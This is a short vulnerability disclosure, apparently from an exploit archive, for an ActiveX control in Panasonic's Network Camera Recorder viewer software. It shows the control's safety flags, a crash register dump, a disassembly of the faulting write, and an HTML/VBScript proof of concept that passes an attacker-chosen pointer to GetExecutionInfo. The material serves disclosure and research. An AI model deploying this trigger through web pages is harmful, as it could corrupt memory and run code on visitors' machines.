Panasonic Network Camera Recorder with Viewer Software Lite Activex remote code execution

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
File: NcrCtl4.ocx
GUID: {72DA075F-F92E-46B7-9EA5-4C144415AB50}
progID: NcrCtl4.NcrNet.1
Des.: CNcrNet Object
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data
CPU - thread 9. (00000C28), module NcrCtl4_ocx
EAX 41414141
ECX 00000000
EDX 00067932
EBX 00067932
EBP 41414141
ESI 029D4FA8
EDI 77124920 OLEAUT32.VariantClear
EIP 1008D2F0 NcrCtl4_ocx.1008D2F0

CPU Disasm
Address   Hex dump          Command                                  Comments
1008D2D0  /> \56            PUSH ESI
1008D2D1  |.  8B7424 08     MOV ESI,DWORD PTR SS:[ARG.1]
1008D2D5  |.  81C6 68010000 ADD ESI,168
1008D2DB  |.  56            PUSH ESI                                 
1008D2DC  |.  FF15 50E11210 CALL DWORD PTR DS:[<&KERNEL32.EnterCriti 
1008D2E2  |.  8B0D B89F1B10 MOV ECX,DWORD PTR DS:[101B9FB8]
1008D2E8  |.  8B4424 0C     MOV EAX,DWORD PTR SS:[ARG.2]
1008D2EC  |.  8B5424 10     MOV EDX,DWORD PTR SS:[ARG.3]
1008D2F0  |.  8908          MOV DWORD PTR DS:[EAX],ECX               ; <- ACCESS VIOLATION WRITING TO
1008D2F2  |.  A1 BC9F1B10   MOV EAX,DWORD PTR DS:[101B9FBC]
1008D2F7  |.  8B4C24 14     MOV ECX,DWORD PTR SS:[ARG.4]
1008D2FB  |.  8902          MOV DWORD PTR DS:[EDX],EAX
1008D2FD  |.  8B15 C09F1B10 MOV EDX,DWORD PTR DS:[101B9FC0]
1008D303  |.  56            PUSH ESI                                 
1008D304  |.  8911          MOV DWORD PTR DS:[ECX],EDX               
1008D306  |.  FF15 54E11210 CALL DWORD PTR DS:[<&KERNEL32.LeaveCriti 
1008D30C  |.  33C0          XOR EAX,EAX
1008D30E  |.  5E            POP ESI
1008D30F  \.  C2 1000       RETN 10
Proof of concept:

 <object classid='clsid:72DA075F-F92E-46B7-9EA5-4C144415AB50' id='test'></object>
  <script language = 'vbscript'>
   test.GetExecutionInfo 1094795585, 424242, 434343